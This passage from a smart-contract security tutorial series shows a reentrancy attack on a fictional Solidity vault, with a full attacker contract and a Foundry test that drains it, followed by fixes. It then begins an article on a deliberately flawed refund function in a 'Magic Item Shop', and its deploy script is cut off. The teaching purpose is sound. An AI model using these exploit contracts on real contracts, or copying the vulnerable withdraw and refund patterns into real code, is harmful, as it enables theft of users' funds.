Guild members can contribute to the shared treasure by depositing Ether. The `deposit` function ensures that only members can deposit funds. It also validates that the deposit amount is greater than zero and then updates the member’s balance as well as the total vault balance. This function plays a critical role in maintaining the integrity of the shared vault.

```solidity
function deposit() external payable onlyMembers {
    require(msg.value &gt; 0, &quot;You must deposit some treasure!&quot;);

    guildMembers[msg.sender].balance += msg.value;
    totalVaultBalance += msg.value;
}

```

Withdrawing treasure is just as important as depositing it. The `withdraw` function allows members to retrieve their deposited Ether. The function checks that the withdrawal amount is valid and that the member has sufficient funds. Crucially, the Ether is transferred to the member first, and the balances are only updated afterward; this ordering is precisely what makes the function vulnerable.

```solidity
function withdraw(uint256 amount) external onlyMembers {
    Member storage member = guildMembers[msg.sender];
    require(amount &gt; 0, &quot;Withdrawal amount must be greater than zero!&quot;);
    require(
        member.balance &gt;= amount,
        &quot;Not enough balance in your treasure account!&quot;
    );

    (bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
    require(success, &quot;Failed to send Ether!&quot;);
    member.balance -= amount;
    totalVaultBalance -= amount;
}

```

Lastly, the contract can receive Ether directly through its `receive` function. This function is triggered whenever Ether is sent to the contract’s address without specifying any function. It ensures that the vault can accept funds even outside structured deposits.

```solidity
receive() external payable {
    totalVaultBalance += msg.value;
}

```

# **The Strategy Behind Exploiting the Vault**

To exploit the vulnerability in the **Pirate&apos;s Guild Vault**, we utilize a classic reentrancy attack. This attack manipulates the sequence of operations in the `withdraw` function, allowing us to withdraw funds repeatedly before the contract updates the user’s balance. By leveraging this flaw, an attacker can drain the vault of all its Ether. In this section, we’ll break down the strategy and introduce the malicious contract that executes the attack.

## **Understanding the Exploitation Plan**

The reentrancy attack hinges on a crucial misstep in the `withdraw` function of the vault. Specifically, the Ether transfer to the user occurs **before** the user’s balance is updated. This sequence allows an attacker to execute the following strategy:

1.  **Infiltration:** The attacker first registers as a legitimate guild member using the `joinGuild` function of the vault.
2.  **Setup:** The attacker deposits a small amount of Ether (e.g., 1 ETH) into the vault to ensure they have a balance to withdraw.
3.  **Trigger:** The attacker invokes the `withdraw` function to withdraw their deposited Ether. When the Ether is sent, the attacker contract&apos;s `receive` function is triggered.
4.  **Reentrancy:** Instead of simply accepting the Ether, the attacker&apos;s `receive` function calls `withdraw` again, re-entering the vault contract **before the balance is updated**. This process repeats in a loop, draining the vault in chunks.
5.  **Cleanup:** Once the vault is empty, the attacker stops the reentrancy loop and collects the stolen Ether.

## **The Malicious Contract: `TheTraitorWithin`**

To execute this attack, we deploy a specialized malicious contract named `TheTraitorWithin`. Below is a breakdown of its components and functionality.

&lt;details&gt;
&lt;summary&gt;Malicious Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;./PiratesGuildVault.sol&quot;;

contract TheTraitorWithin {
    PiratesGuildVault public targetVault;
    address public traitor;
    bool public heistInProgress;

    // Debugging events
    event BankDebug(string message, uint256 value, uint256 vaultBalance);
    event FallbackTriggered(
        string message,
        uint256 value,
        uint256 vaultBalance
    );

    constructor(address payable _vaultAddress) {
        targetVault = PiratesGuildVault(_vaultAddress);
        traitor = msg.sender;
    }

    // The traitor secretly joins the bank as a trusted member
    function infiltrate() external {
        require(
            msg.sender == traitor,
            &quot;Only the traitor can infiltrate the bank!&quot;
        );

        emit BankDebug(
            &quot;The traitor infiltrates the bank&quot;,
            0,
            address(targetVault).balance
        );

        targetVault.joinGuild(); // Traitor joins the guild as a legitimate member
    }

    // The traitor initiates the heist
    function executeHeist() external payable {
        require(
            msg.sender == traitor,
            &quot;Only the traitor can execute the heist!&quot;
        );
        require(
            msg.value &gt;= 1 ether,
            &quot;The heist requires at least 1 ETH to proceed!&quot;
        );

        // Log the start of the heist
        emit BankDebug(
            &quot;Heist begins: depositing funds into the vault&quot;,
            msg.value,
            address(targetVault).balance
        );

        // Deposit Ether into the vault
        targetVault.deposit{value: msg.value}();

        // Log after deposit
        emit BankDebug(
            &quot;Funds deposited, preparing for reentrancy attack&quot;,
            msg.value,
            address(targetVault).balance
        );

        // Start the reentrancy heist
        heistInProgress = true;

        // Withdraw the deposited amount to trigger reentrancy
        targetVault.withdraw(msg.value);

        // Ensure the heist concludes properly
        heistInProgress = false;
    }

    // The traitor collects their loot after the heist
    function claimLoot() external {
        require(
            msg.sender == traitor,
            &quot;Only the traitor can claim the stolen loot!&quot;
        );

        emit BankDebug(
            &quot;The traitor claims the stolen funds&quot;,
            address(this).balance,
            address(targetVault).balance
        );

        payable(traitor).transfer(address(this).balance);
    }

    // Receive Ether to continue the attack
    receive() external payable {
        emit FallbackTriggered(
            &quot;Receive triggered during heist&quot;,
            msg.value,
            address(targetVault).balance
        );

        if (heistInProgress &amp;&amp; address(targetVault).balance &gt; 0) {
            targetVault.withdraw(1 ether); // Continue withdrawing funds in small chunks
        }
    }
}

```
&lt;/details&gt;


The constructor of `TheTraitorWithin` initializes the attacker&apos;s identity and sets the target vault contract: the deployer is recorded as the attacker, and the contract is pointed at the specified vulnerable vault.

```solidity
constructor(address payable _vaultAddress) {
    targetVault = PiratesGuildVault(_vaultAddress);
    traitor = msg.sender;
}

```

The `infiltrate` function allows the attacker to join the vault as a legitimate member. By calling the `joinGuild` function on the `PiratesGuildVault`, the malicious contract gains member privileges, laying the groundwork for the attack. It also emits a debug event to log the infiltration.

```solidity
function infiltrate() external {
    require(
        msg.sender == traitor,
        &quot;Only the traitor can infiltrate the bank!&quot;
    );

    emit BankDebug(
        &quot;The traitor infiltrates the bank&quot;,
        0,
        address(targetVault).balance
    );

    targetVault.joinGuild(); // Traitor joins the guild as a legitimate member
}

```

The `executeHeist` function initiates the attack by first depositing Ether into the vault. This makes the contract appear as a legitimate participant. Once the deposit is made, it triggers a withdrawal to exploit the reentrancy vulnerability. The `heistInProgress` flag ensures that the `receive` function knows when to continue exploiting the vulnerability.

```solidity
function executeHeist() external payable {
    require(
        msg.sender == traitor,
        &quot;Only the traitor can execute the heist!&quot;
    );
    require(
        msg.value &gt;= 1 ether,
        &quot;The heist requires at least 1 ETH to proceed!&quot;
    );

    emit BankDebug(
        &quot;Heist begins: depositing funds into the vault&quot;,
        msg.value,
        address(targetVault).balance
    );

    targetVault.deposit{value: msg.value}();

    emit BankDebug(
        &quot;Funds deposited, preparing for reentrancy attack&quot;,
        msg.value,
        address(targetVault).balance
    );

    heistInProgress = true;

    targetVault.withdraw(msg.value);

    heistInProgress = false;
}

```

In this exploit, the `receive` function in the malicious contract is used strategically to intercept Ether transfers during a withdrawal process. It enables the attacker to repeatedly invoke the vulnerable contract&apos;s `withdraw` function each time the malicious contract receives Ether. By doing so, the attack loops continuously, draining the vault’s balance until it is fully exhausted.

Here’s the implementation of the `receive` function in the malicious contract, showcasing how it sustains the attack loop:

```solidity
receive() external payable {
    emit FallbackTriggered(
        &quot;Receive triggered during heist&quot;,
        msg.value,
        address(targetVault).balance
    );

    if (heistInProgress &amp;&amp; address(targetVault).balance &gt; 0) {
        targetVault.withdraw(1 ether); // Continue withdrawing funds in small chunks
    }
}

```

# Testing the Vulnerability in the Pirate&apos;s Guild Vault

In this section, we&apos;ll use Foundry to automate the process of testing the reentrancy vulnerability in the Pirate&apos;s Guild Vault contract. We will leverage Foundry&apos;s testing capabilities to not only execute the exploit but also verify that the vulnerability is successfully exploited.

&lt;details&gt;
&lt;summary&gt;Testing the Exploit&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/PiratesGuildVault.sol&quot;;
import &quot;../src/TheTraitorWithin.sol&quot;;

contract TraitorInBankTest is Test {
    PiratesGuildVault public vault;
    TheTraitorWithin public traitorContract;

    address public traitor = address(0x123);
    address public victim = address(0x456);

    function setUp() public {
        // Fund the traitor and the victim with Ether
        vm.deal(traitor, 10 ether);
        vm.deal(victim, 5 ether);

        // Deploy the vulnerable contract
        vault = new PiratesGuildVault();

        // Deploy the traitor contract from the traitor&apos;s address
        vm.prank(traitor);
        traitorContract = new TheTraitorWithin(payable(address(vault)));

        // The victim joins the vault and deposits funds
        vm.startPrank(victim);
        vault.joinGuild();
        vault.deposit{value: 5 ether}();
        vm.stopPrank();
    }

    function testTraitorHeist() public {
        // Verify that the vault has the expected balance before the attack
        assertEq(
            address(vault).balance,
            5 ether,
            &quot;Vault initial balance incorrect&quot;
        );

        // The traitor infiltrates the vault through their malicious contract
        vm.startPrank(traitor);
        traitorContract.infiltrate();

        // The traitor executes the heist
        traitorContract.executeHeist{value: 1 ether}();
        traitorContract.claimLoot();

        console.log(&quot;Final balance of the traitor:&quot;, traitor.balance);

        // Verify balances after the heist
        assertEq(address(vault).balance, 0 ether, &quot;Vault balance not drained&quot;);
        assertGt(
            address(traitor).balance,
            10 ether,
            &quot;Traitor did not gain expected funds&quot;
        );
        vm.stopPrank();
    }
}

```
&lt;/details&gt;


## Setting Up the Testing Environment

To start, we set up a testing environment where both the vulnerable contract (`PiratesGuildVault`) and the malicious contract (`TheTraitorWithin`) are deployed. The testing environment simulates a real-world scenario by assigning two roles: the **victim**, who deposits Ether into the vault, and the **traitor**, who uses a malicious contract to exploit the vault.

```solidity
function setUp() public {
    // Fund the traitor and the victim with Ether
    vm.deal(traitor, 10 ether);
    vm.deal(victim, 5 ether);

    // Deploy the vulnerable contract
    vault = new PiratesGuildVault();

    // Deploy the malicious contract from the traitor&apos;s address
    vm.prank(traitor);
    traitorContract = new TheTraitorWithin(payable(address(vault)));

    // The victim joins the vault and deposits funds
    vm.startPrank(victim);
    vault.joinGuild();
    vault.deposit{value: 5 ether}();
    vm.stopPrank();
}

```

This setup ensures the test accurately simulates a real-world deployment of the exploit. The victim deposits 5 Ether into the vault, and the traitor is equipped with the necessary resources to execute the attack. Success is confirmed when the attacker’s balance increases from 10 Ether to 15 Ether, demonstrating that the vault has been effectively drained.

## Executing the Attack

The next step is simulating the attack through the test function. The **traitor** begins by infiltrating the guild to join as a legitimate member, which is a prerequisite for interacting with the vault.

```solidity
traitorContract.infiltrate();

```

After successfully joining, the traitor executes the heist by depositing 1 Ether into the vault and immediately triggering a reentrancy attack to drain its funds.

```solidity
traitorContract.executeHeist{value: 1 ether}();

```

Once the attack is complete, the traitor claims the stolen funds from their malicious contract:

```solidity
traitorContract.claimLoot();

```

## Validating the Results

Finally, the test validates whether the exploit succeeded by comparing the vault&apos;s balance and the traitor&apos;s final balance against expected values.

```solidity
// Verify balances after the heist
assertEq(address(vault).balance, 0 ether, &quot;Vault balance not drained&quot;);
assertGt(
    address(traitor).balance,
    10 ether,
    &quot;Traitor did not gain expected funds&quot;
);

```

These assertions ensure the vault was fully drained and the traitor successfully gained funds.

# Understanding the Test Failure with Forge

When we execute the test using **Forge**, we encounter a failure during the reentrancy attack simulation. The output reveals an exception with the error message: **&quot;Failed to send Ether!&quot;**. This issue arises due to the behavior of the reentrancy attack after draining all the Ether from the vault. Let’s break it down.

```bash
forge test -v
forge test -vvv

```

![](/content/images/2024/11/image-21.png)

Error running the exploit

![](/content/images/2024/11/image-23.png)

Logs of the exploit

#### Why the Exception Occurs

During the reentrancy attack, the malicious contract continuously calls the `withdraw` function of the vulnerable contract (`PiratesGuildVault`). Each recursive call successfully drains Ether from the vault until its balance reaches zero. However, the issue lies in how the `withdraw` function is implemented.

Once the vault is fully drained, the attack doesn’t immediately stop, because control still has to unwind through every pending `withdraw` call. As each nested call returns, the vulnerable function resumes after the Ether transfer and executes `member.balance -= amount`. The attacker’s recorded balance only ever held 1 ether, so after the first successful subtraction the next one underflows, and Solidity 0.8’s checked arithmetic reverts. That revert bubbles up through the parent frames: the external `call` in each enclosing `withdraw` now returns `false`, which trips the `require` and surfaces the exception.

```solidity
(bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
require(success, &quot;Failed to send Ether!&quot;);

```

Here, the `require` is what surfaces the error, but the root cause sits just after it. Two things happen as the call stack unwinds:

1.  **Arithmetic Underflow**: Subtracting `amount` from `member.balance` and `totalVaultBalance` would produce a negative number. Solidity 0.8’s checked arithmetic reverts in such cases, throwing an exception.
2.  **Failed Ether Transfer**: That revert propagates into the enclosing frame’s external `call`, which therefore returns `false` and makes the function revert with the message: **&quot;Failed to send Ether!&quot;**.
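The underflow half of this failure is just Solidity 0.8’s checked arithmetic at work; a standalone (hypothetical) snippet makes it concrete:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract UnderflowDemo {
    // Reverts with Panic(0x11) whenever b &gt; a: checked arithmetic is the default in 0.8+
    function sub(uint256 a, uint256 b) external pure returns (uint256) {
        return a - b;
    }

    // Pre-0.8 behavior: silently wraps around instead of reverting
    function subUnchecked(uint256 a, uint256 b) external pure returns (uint256) {
        unchecked {
            return a - b;
        }
    }
}

```

In the vault, `member.balance -= amount` behaves like `sub` above: subtracting 1 ether from a recorded balance that has already reached zero reverts the whole call.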

#### Observing the Failure in the Test

The Forge test output highlights this issue. After draining all the Ether, the recursive attack proceeds, and the vulnerable function fails when it attempts to subtract balances or transfer Ether. This behavior is seen in the trace:

1.  Ether is drained recursively until the balance reaches zero.
2.  Further recursive calls result in a **revert** due to arithmetic errors or failed transfers.

#### Addressing the Issue in the Vulnerable Contract

To ensure the test does not fail in this manner, we can modify the `withdraw` function of the vulnerable contract to handle edge cases where the balance is insufficient for transfer. The following conditional logic can be added to prevent execution when the balances are already depleted:

```solidity
(bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
require(success, &quot;Failed to send Ether!&quot;);
if (member.balance &gt; 0 &amp;&amp; totalVaultBalance &gt; 0) {
    member.balance -= amount;
    totalVaultBalance -= amount;
}

```

Here’s how this logic works:

-   The subtraction of `member.balance` and `totalVaultBalance` is only executed while their values are greater than zero, so the unwinding calls no longer underflow.
-   Note that this change is purely for demonstration: it lets the exploit run to completion in the test, but it also leaves the vault’s bookkeeping inconsistent. It is not a real fix; the proper mitigation is covered later in this chapter.

If we now run the test after making the changes, we’ll observe that the attacker successfully drains the vault&apos;s Ether, ending up with significantly more Ether than they initially deposited—despite only contributing 1 ETH to the vault at the start.

![](/content/images/2024/11/image-24.png)

Running the exploit after fixing the code

I wanted to highlight this error because it’s a crucial detail in understanding how Ethereum&apos;s transaction system works and why testing on real networks behaves differently compared to a controlled environment.

In a real network, if an exception is triggered during a transaction—such as attempting to deduct Ether from an empty balance—the **entire transaction will be reverted**. This means the attacker **won’t be able to keep the Ether they were trying to withdraw in that specific transaction**.

Ethereum transactions operate atomically, meaning that if any part of the transaction fails (like throwing an exception), the network will completely revert the state to what it was before the transaction started. This includes undoing any Ether transfers made during that transaction.
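This atomicity can be verified directly in Foundry. The following sketch (a hypothetical test name, reusing the fixtures from the test contract above and targeting the unmodified vulnerable vault) asserts that the reverted heist leaves the vault untouched:

```solidity
function testHeistRevertsAtomically() public {
    uint256 balanceBefore = address(vault).balance;

    vm.startPrank(traitor);
    traitorContract.infiltrate();

    // The underflow during unwinding reverts the entire transaction...
    vm.expectRevert();
    traitorContract.executeHeist{value: 1 ether}();
    vm.stopPrank();

    // ...so every nested withdrawal is rolled back and nothing was stolen
    assertEq(address(vault).balance, balanceBefore);
}

```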

One subtlety is worth stressing: in our exploit, every nested `withdraw` happens inside a single transaction (the call to `executeHeist`), so a revert at any depth undoes all of them together and the attacker keeps nothing. Only Ether stolen in separate, successfully completed transactions is beyond recovery; each of those is final and cannot be undone retroactively. This is why a careful attacker structures the exploit so that each transaction completes without reverting, for example by checking the vault’s remaining balance before re-entering.

# Mitigating the Reentrancy Vulnerability

Now that we’ve explored how the reentrancy vulnerability works and tested it in action, it’s time to focus on fixing the flaw to ensure the smart contract operates securely. Reentrancy attacks exploit the sequence of operations, so our primary goal is to re-architect the vulnerable function to prevent recursive calls.

#### Applying the Checks-Effects-Interactions Pattern

The **Checks-Effects-Interactions** pattern is a well-known best practice in smart contract development. It involves:

1.  **Checks**: Validate input conditions and enforce rules at the beginning of the function.
2.  **Effects**: Update the contract&apos;s state variables to reflect the intended changes.
3.  **Interactions**: Transfer Ether or interact with external contracts only after state variables are updated.

In the context of the `PiratesGuildVault` contract, the vulnerability arises from transferring Ether to the caller (`msg.sender`) **before** updating the user’s balance and the vault&apos;s total balance. To fix this, we must ensure that the balances are updated before transferring Ether.

Here’s the updated `withdraw` function implementing the fix:

```solidity
function withdraw(uint256 amount) external onlyMembers {
    Member storage member = guildMembers[msg.sender];
    require(amount &gt; 0, &quot;Withdrawal amount must be greater than zero!&quot;);
    require(
        member.balance &gt;= amount,
        &quot;Not enough balance in your treasure account!&quot;
    );

    // Update balances before transferring Ether
    member.balance -= amount;
    totalVaultBalance -= amount;

    // Transfer Ether after state update
    (bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
    require(success, &quot;Failed to send Ether!&quot;);
}

```

#### Why This Fix Works

1.  **State Updates First**: By reducing the balance **before** transferring Ether, any reentrant calls made by the attacker will fail the `require` checks, as the balance will no longer meet the required conditions.
2.  **Safe External Interaction**: The Ether transfer occurs only after the contract&apos;s state is fully updated, effectively breaking the loop that enables reentrancy.

#### Additional Best Practices

While the `Checks-Effects-Interactions` pattern significantly reduces the risk of reentrancy, developers should also consider:

-   **Using `ReentrancyGuard`**: OpenZeppelin&apos;s `ReentrancyGuard` is a utility that prevents reentrant calls by locking the function during execution.
-   **Being Careful with Low-Level `call`**: `transfer` and `send` forward a fixed 2,300-gas stipend, which historically limited reentrancy, but they are now discouraged because opcode gas repricing can break legitimate receivers. Prefer `call` combined with the checks-effects-interactions pattern or a reentrancy guard.
-   **Auditing and Testing**: Ensure thorough testing, such as the automated tests we demonstrated earlier, to verify that the vulnerability is eliminated.
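As an illustration of the guard approach, here is a minimal sketch using OpenZeppelin’s `ReentrancyGuard` (the import path below matches OpenZeppelin Contracts v5; v4 shipped it under `security/ReentrancyGuard.sol`):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;@openzeppelin/contracts/utils/ReentrancyGuard.sol&quot;;

contract GuardedVault is ReentrancyGuard {
    mapping(address =&gt; uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // nonReentrant sets a lock for the duration of the call, so a
    // reentrant withdraw() from an attacker&apos;s receive() reverts immediately
    function withdraw(uint256 amount) external nonReentrant {
        require(balances[msg.sender] &gt;= amount, &quot;Insufficient balance&quot;);
        balances[msg.sender] -= amount;
        (bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
        require(success, &quot;Failed to send Ether!&quot;);
    }
}

```

The guard complements, rather than replaces, the checks-effects-interactions ordering shown earlier.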

# Conclusions

Reentrancy attacks highlight the critical need for secure coding practices in smart contract development. This chapter demonstrated how reentrancy exploits occur, how to test for them with Foundry, and why automation is essential for robust defenses.

#### Key Takeaways

-   **Vulnerability Root Cause**: Reentrancy attacks exploit sending Ether before updating state variables, allowing recursive calls to drain funds.
-   **Testing in Action**: Simulating the attack with Foundry uncovered the vulnerability and emphasized the importance of automated testing for real-world scenarios.
-   **Preventive Measures**: Adopting the **checks-effects-interactions** pattern and updating state variables before transfers mitigates this risk.

By understanding and addressing vulnerabilities like reentrancy, developers can create more secure, resilient smart contracts, fostering trust and reliability in decentralized systems.

# Resources

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: https://book.getfoundry.sh/
-   **Solidity** - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   **Reentrancy Attacks** - Understanding and Preventing Reentrancy. &quot;Solidity Documentation: Security Considerations.&quot; Available at: [https://docs.soliditylang.org/en/v0.8.0/security-considerations.html#re-entrancy](https://docs.soliditylang.org/en/v0.8.0/security-considerations.html#re-entrancy)
-   **OpenZeppelin** - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Testing Ethereum Smart Contracts** - Best Practices with Foundry. &quot;Foundry Documentation.&quot; Available at: https://book.getfoundry.sh/tutorials/testing</content:encoded><author>Ruben Santos</author></item><item><title>Refunds Gone Wrong: How Access Control Flaws Can Drain Your Contract</title><link>https://www.kayssel.com/post/web3-3</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-3</guid><description>This article explores a smart contract access control vulnerability using the Magic Item Shop example. By demonstrating an exploit due to missing ownership checks, we highlight the importance of verifying caller authorization, rigorous testing, and secure coding practices to protect contracts.</description><pubDate>Sun, 17 Nov 2024 14:18:29 GMT</pubDate><content:encoded># Access Control Vulnerabilities in Smart Contracts

In smart contract security, enforcing strict access control is critical to protect contracts from unauthorized actions that could lead to abuse. Access control vulnerabilities—where an attacker gains access to functions meant for specific users—are common in blockchain and can lead to significant losses or unwanted behavior, especially in contracts handling assets or funds.

In this chapter, we’ll walk through an access control vulnerability in a fictional Magic Item Shop smart contract, designed to allow users to buy, gift, and return magical items. However, there’s an exploitable flaw within the refund process, showcasing how insufficient access control can be a security risk, even in seemingly straightforward functions.

Here’s our plan of action:

1.  **Contract Overview**: We’ll start by reviewing the Magic Item Shop contract to understand its intended behavior and user roles.
2.  **Deploying the Contract**: I’ll provide a script to deploy this contract locally, allowing you to interact with it directly.
3.  **Examining the Code**: We’ll observe how functions manage ownership and access, simulating typical user actions.
4.  **Exploit Walkthrough**: We’ll exploit the access control flaw, triggering unauthorized refunds to highlight the risk.
5.  **Security Takeaways**: Finally, we’ll cover key security principles for managing access control in smart contracts to avoid similar vulnerabilities.

By the end of this chapter, you’ll understand how access control oversights can lead to serious vulnerabilities in smart contracts and learn strategies for protecting them. Let’s get started!

# Explanation of the Smart Contract: **Magic Item Shop**

The **Magic Item Shop** is a smart contract that sets up a simple marketplace where users can buy, gift, and even return magical items with different levels of rarity and prices. Each item has a unique ID, a rarity level (like &quot;common&quot; or &quot;legendary&quot;), a set price in Ether, and an owner. This contract is set up to let users trade and manage these items, while also allowing the shop owner to add new ones. Let’s walk through how it works.

&lt;details&gt;
&lt;summary&gt;Magic Item Shop contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract MagicItemShop {
    address public owner;
    address public shopAddress;
    uint256 public itemCount;

    struct Item {
        uint256 id;
        string name;
        string rarity;
        uint256 price;
        address currentOwner;
    }

    mapping(uint256 =&gt; Item) public items;

    event ItemAdded(uint256 itemId, string name, string rarity, uint256 price);
    event ItemPurchased(uint256 itemId, address indexed buyer, uint256 price);
    event ItemReturned(
        uint256 itemId,
        address indexed returner,
        uint256 refund
    );
    event OwnershipTransferred(uint256 itemId, address indexed newOwner);

    constructor() {
        owner = msg.sender;
        shopAddress = address(this);
    }

    // Modifier to restrict certain actions to the contract owner
    modifier onlyOwner() {
        require(msg.sender == owner, &quot;Caller is not the owner&quot;);
        _;
    }

    // Add a new item to the shop (only the owner can add items)
    function addItem(
        string memory name,
        string memory rarity,
        uint256 price
    ) public onlyOwner {
        items[itemCount] = Item(itemCount, name, rarity, price, shopAddress);
        emit ItemAdded(itemCount, name, rarity, price);
        itemCount++;
    }

    // Purchase an item by paying the specified price
    function purchaseItem(uint256 itemId) public payable {
        require(itemId &lt; itemCount, &quot;Item does not exist&quot;);
        Item storage item = items[itemId];
        require(item.currentOwner == shopAddress, &quot;Item already sold&quot;);
        require(msg.value &gt;= item.price, &quot;Insufficient funds to purchase item&quot;);

        item.currentOwner = msg.sender;
        emit ItemPurchased(itemId, msg.sender, msg.value);
    }

    // Function that lets users &quot;return&quot; an item to the shop
    function returnItemToShop(uint256 itemId) public {
        Item storage item = items[itemId];

        // Refund is set to half of the original price
        uint256 refundAmount = item.price / 2;

        item.currentOwner = shopAddress;
        payable(msg.sender).transfer(refundAmount);

        emit ItemReturned(itemId, msg.sender, refundAmount);
    }

    // Function to &quot;gift&quot; an item to another user (accessible by the item owner only)
    function giftItem(uint256 itemId, address newOwner) public {
        require(newOwner != address(0), &quot;New owner cannot be zero address&quot;);
        require(
            msg.sender == items[itemId].currentOwner,
            &quot;Only item owner can gift&quot;
        );

        items[itemId].currentOwner = newOwner;
        emit OwnershipTransferred(itemId, newOwner);
    }

    // Get the list of items currently available for sale
    function getItemsForSale() public view returns (Item[] memory) {
        // Count how many items are still for sale
        uint256 unsoldItemCount = 0;
        for (uint256 i = 0; i &lt; itemCount; i++) {
            if (items[i].currentOwner == shopAddress) {
                unsoldItemCount++;
            }
        }

        // Create an array to store unsold items
        Item[] memory unsoldItems = new Item[](unsoldItemCount);
        uint256 index = 0;

        // Populate the array with items that are still for sale
        for (uint256 i = 0; i &lt; itemCount; i++) {
            if (items[i].currentOwner == shopAddress) {
                unsoldItems[index] = items[i];
                index++;
            }
        }

        return unsoldItems;
    }
}

```
&lt;/details&gt;


First up is the `addItem` function. This function is what the shop owner uses to add new items to the store. When the owner calls `addItem`, they specify the item’s name, rarity, and price, and the item gets added to a list with a unique ID. Only the owner of the contract can add items, which is important for keeping control over what’s in the shop. Here’s the code for `addItem`:

```solidity
function addItem(string memory name, string memory rarity, uint256 price) public onlyOwner {
    items[itemCount] = Item(itemCount, name, rarity, price, shopAddress);
    itemCount++;
}

```

Next, we have `purchaseItem`, the function that lets users buy an item from the shop. When someone calls `purchaseItem`, they send the required amount of Ether for the item they want. The contract checks that the item exists, that it hasn’t already been sold, and that the buyer has sent enough Ether to cover the price. If all these checks pass, the function transfers ownership of the item from the shop to the buyer’s address, making them the new owner. Here’s the code for `purchaseItem`:

```solidity
function purchaseItem(uint256 itemId) public payable {
    require(itemId &lt; itemCount, &quot;Item does not exist&quot;);
    Item storage item = items[itemId];
    require(item.currentOwner == shopAddress, &quot;Item already sold&quot;);
    require(msg.value &gt;= item.price, &quot;Insufficient funds to purchase item&quot;);

    item.currentOwner = msg.sender;
}

```
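
Those three `require` checks can also be sketched as a plain in-memory Python model. The `SHOP` sentinel and `purchase_item` helper below are hypothetical stand-ins for the on-chain state, not web3.py code:

```python
SHOP = object()  # sentinel standing in for shopAddress

def purchase_item(items, item_id, buyer, value):
    # items is a list of [price, current_owner] pairs
    if item_id not in range(len(items)):
        raise IndexError       # Item does not exist
    price, owner = items[item_id]
    if owner is not SHOP:
        raise PermissionError  # Item already sold
    if min(value, price) != price:
        raise ValueError       # Insufficient funds: value is below price
    items[item_id][1] = buyer  # ownership moves from the shop to the buyer
    return True
```

The `min` comparison mirrors the `msg.value` check: the purchase only goes through when the attached value is at least the price.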

The contract also includes a `giftItem` function, which allows users who already own an item to give it to someone else. This could be useful for gifting items to friends or trading within the marketplace. Before transferring the item, the function checks to make sure the caller is actually the current owner. Once confirmed, it then assigns the new owner’s address to the item. This function is straightforward but essential for enabling transfers between users. Here’s how `giftItem` is set up:

```solidity
function giftItem(uint256 itemId, address newOwner) public {
    require(newOwner != address(0), &quot;New owner cannot be zero address&quot;);
    require(msg.sender == items[itemId].currentOwner, &quot;Only item owner can gift&quot;);

    items[itemId].currentOwner = newOwner;
}

```

Finally, we come to `returnItemToShop`, which allows users to “sell back” items they no longer want. The idea here is simple: users can return an item to the shop and receive a partial refund (half of the item’s price). The function transfers the Ether back to the user and marks the item’s owner as the shop again, as if the item were back on the shelf.

```solidity
function returnItemToShop(uint256 itemId) public {
    Item storage item = items[itemId];

    // Refund is set to half of the original price
    uint256 refundAmount = item.price / 2;

    // No access control: anyone can call this function and change the owner
    item.currentOwner = shopAddress;
    payable(msg.sender).transfer(refundAmount);
}

```
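
To make the risk concrete before touching the chain, here is a hypothetical Python model of this flawed logic. The `return_item` helper mirrors `returnItemToShop` and pays any caller, owner or not:

```python
SHOP = object()  # sentinel standing in for shopAddress

def return_item(items, shop_balance, item_id, caller):
    # Flawed logic: the caller is never checked against the current owner.
    price, _owner = items[item_id]
    refund = price // 2
    items[item_id][1] = SHOP              # ownership snaps back to the shop
    return shop_balance - refund, refund  # the shop pays the caller

# A caller who owns nothing drains the shop one half-price refund at a time.
items = [[10, object()]]  # price 10 wei, owned by some other user
balance = 100
for _ in range(5):
    balance, refund = return_item(items, balance, 0, caller=object())
```

After five calls the model shop has paid out 25 wei to an address that never bought anything, which is exactly the behavior the on-chain exploit demonstrates later in this article.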

# Script for Deploying the Magic Item Shop Contract

Here, we’re going to walk through the script that deploys our **Magic Item Shop** contract and sets it up with a few magical items for users to buy. This deployment script is written in JavaScript using Hardhat, a tool that makes working with Ethereum smart contracts easier. Not only does this script handle deploying the contract, but it also adds some initial items to the shop with specific names, rarities, and prices, so our contract is ready to go right after deployment.

&lt;details&gt;
&lt;summary&gt;Deployment Script&lt;/summary&gt;

```js
// Import Hardhat Runtime Environment and ethers
const hre = require(&quot;hardhat&quot;);

async function main() {
  // Get the contract factory and deploy the MagicItemShop contract
  const MagicItemShop = await hre.ethers.getContractFactory(&quot;MagicItemShop&quot;);
  const shop = await MagicItemShop.deploy();
  await shop.waitForDeployment();

  console.log(&quot;MagicItemShop deployed to:&quot;, shop.target);

  // Define items to add to the shop
  const items = [
    {
      name: &quot;Sword of Flames&quot;,
      rarity: &quot;Rare&quot;,
      price: hre.ethers.parseEther(&quot;1&quot;),
    },
    {
      name: &quot;Shield of Light&quot;,
      rarity: &quot;Uncommon&quot;,
      price: hre.ethers.parseEther(&quot;0.5&quot;),
    },
    {
      name: &quot;Staff of Wisdom&quot;,
      rarity: &quot;Epic&quot;,
      price: hre.ethers.parseEther(&quot;2&quot;),
    },
    {
      name: &quot;Potion of Healing&quot;,
      rarity: &quot;Common&quot;,
      price: hre.ethers.parseEther(&quot;0.1&quot;),
    },
    {
      name: &quot;Ring of Invisibility&quot;,
